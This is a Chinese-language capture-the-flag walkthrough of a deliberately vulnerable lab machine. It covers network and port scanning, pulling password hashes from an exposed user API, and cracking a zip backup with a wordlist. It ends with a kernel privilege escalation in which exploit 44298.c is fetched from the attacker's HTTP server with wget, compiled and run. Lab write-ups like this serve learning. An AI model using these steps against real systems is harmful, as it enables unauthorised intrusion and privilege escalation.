攻击机:192.168.43.109
被攻击机:192.168.43.164
靶机安装#
- 使用 Virtual Box 打开(vmware 无法正常工作)
- 虚拟机使用桥接模式
网络发现#
-
netdiscover -r 192.168.43.0/24 -
桥接网络与 kali 在同一个网段里面,所以只要扫描上面的网段就行
-
扫描完成后,通过对比 mac 地址找到要攻击的机子
![]()
端口扫描识别#
-
nmap -v -A 192.168.43.164![]()
-
22 是 ssh,3000 是 web 服务
漏洞发现#
-
从 Web 服务下手
-
先扫一下目录
dirb http://192.168.43.164:3000![]()
-
意思就是这个网站太稳定了...访问啥都是同一个页面...毫无变化
-
前面扫描可以知道整个站点使用的是 nodejs 搭建的...所以页面的变化是通过 js 来渲染的
-
打开网站瞧瞧(随手 F12 好习惯)
![]()
-
首页请求了两个非资源类 url
-
第一个是页面模板
-
第二个是用户数据,并在里面发现了一些有意思的数据
![]()
-
密码是 hash 加密的,拿到 cmd5 查一下就查到了
tom- spongebob
-
登录了一下成功了,但是没什么用,有一串提示
![]()
-
就是说只有管理员才能访问控制面板,但是刚才的账号里面并没有管理员
-
因为访问的 url 为:
api/users/latest,(latest=>最新的),看上去这个 latest 像是一个参数,尝试把他去掉后访问![]()
- 找到了管理员账号
- 解密 myP14ceAdm1nAcc0uNT - manchester
-
拿着管理员账号登录成功
![]()
-
可以下载备份文件,备份是一串 base64 编码
-
尝试解码
cat myplace.backup|base64 -d >mypalce![]()
-
解开之后是个压缩包
-
解压
unzip mypalce![]()
-
需要密码,尝试了上面的管理员密码,失败,考虑爆破,采用 kali 自带的 rockyou.txt,使用前需要解压
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u mypalce![]()
-
解出来的密码为 magicword
-
在 app.js 里面发现了 mongodb 的账号(mark)和密码(5AYRft73VtFpc84k),监听在本地端口 27017
![]()
-
然而比较尴尬的事情是,知道了也登不上去...端口没开,也不允许远程登录......
-
又搜了所有的文件也没什么有用的信息(其实不是很懂 nodejs,不过从 js 的角度看,好像没有什么漏洞)
-
前面不是还找到了一个 ssh 的端口嘛~试试从这里下手
![]()
-
居然登录成功了...
-
权限低的可怜...
-
![]()
-
没有发现可以直接提权的地方,查一下系统信息(要站在巨人的肩膀上,hhh)
uname -a![]()
-
用 kali 查找内核漏洞
searchsploit 4.4.0![]()
-
有一个可以直接用的 exp,kali 搭建临时服务器
cd /usr/share/exploitdb/exploits/linux/local/python -m SimpleHTTPServer 80 -
ssh 切换到 tmp 目录,并下载这个 exp,使用 gcc 编译运行
cd /tmpwget http://192.168.43.109/44298.cgcc 44298.c -o exp./exp -
直接就切换到了 root 权限
-
由于做到最后电脑突然出问题,蓝屏了就不截图了
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论